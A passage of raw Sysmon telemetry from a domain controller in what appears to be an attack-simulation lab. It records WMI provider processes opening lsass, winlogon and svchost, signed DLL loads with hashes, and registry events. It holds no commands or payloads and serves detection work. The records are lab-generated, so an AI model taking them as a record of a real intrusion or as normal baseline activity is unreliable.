.dll+1ae1c 10341000x800000000000000057348575Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-1300-00000000F101}1040C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348574Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-1200-00000000F101}460C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348573Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-1100-00000000F101}420C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348572Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-1000-00000000F101}452C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348571Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-0F00-00000000F101}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348570Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-0E00-00000000F101}1000C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 11241100x800000000000000057348569Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 10341000x800000000000000057348568Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-0D00-00000000F101}904C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x800000000000000057348567Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D79DAA82236C79FDD41F1F3E3D6AA077,SHA256=6C8E66DA6B7926E9B67BBBFB452B18297BFC15D4889EE3613E676B7E093AFD64falsetrue 10341000x800000000000000057348566Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-0C00-00000000F101}848C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348565Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348564Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8869-6164-0900-00000000F101}588C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 924900x800000000000000057348563Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exe\Device\HarddiskVolume1 10341000x800000000000000057348562Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.773{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057348561Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.773{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057348560Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.773{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057348559Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.773{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\framedynos.dll10.0.14393.4169 (rs1_release.210107-1130)WMI SDK Provider FrameworkMicrosoft® Windows® Operating SystemMicrosoft Corporationframedyn.dllMD5=F5BCBB0713FF862975B07056D25E166E,SHA256=DBB3B6E35E0FEF5B878DE8C85AF578B51C1C2DB025865354E27394AEA87824B2trueMicrosoft WindowsValid 12241200x800000000000000057348558Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.773{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348557Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.773{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348556Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.773{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 12241200x800000000000000057348555Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.758{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\system32\wbem\wmiprvse.exeHKCR 734700x800000000000000057348554Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.758{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbem\wmiutils.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwmiutils.dllMD5=5179B0DEF3AB5CAC3BA02316AF1B6B40,SHA256=FA4112CB0D1A133C41FD001F958F0BE930BB49072BF97A3D765AEA8DB841ABC4trueMicrosoft WindowsValid 10341000x800000000000000057348553Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.758{8B6011A9-886E-6164-1600-00000000F101}13168260C:\Windows\System32\svchost.exe{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057348552Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbem\wbemsvc.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemsvc.dllMD5=2BE97028B7B85762561F475E31989C2A,SHA256=75C9D8C6D41B4B7D70666A8107A08A748CEF6CB9E60AD0288B10CDE12E274AFFtrueMicrosoft WindowsValid 734700x800000000000000057348551Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057348550Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057348549Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbem\wbemprox.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemprox.dllMD5=B7B56FAC395BEEDC20120FD0170A23A3,SHA256=7BDF579D7348D84F251A8411E40E14ADF9406F954914C1C4DE30E880DCF6CEB3trueMicrosoft WindowsValid 734700x800000000000000057348548Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 10341000x800000000000000057348547Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.742{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057348546Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057348545Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057348544Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057348543Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057348542Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.742{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 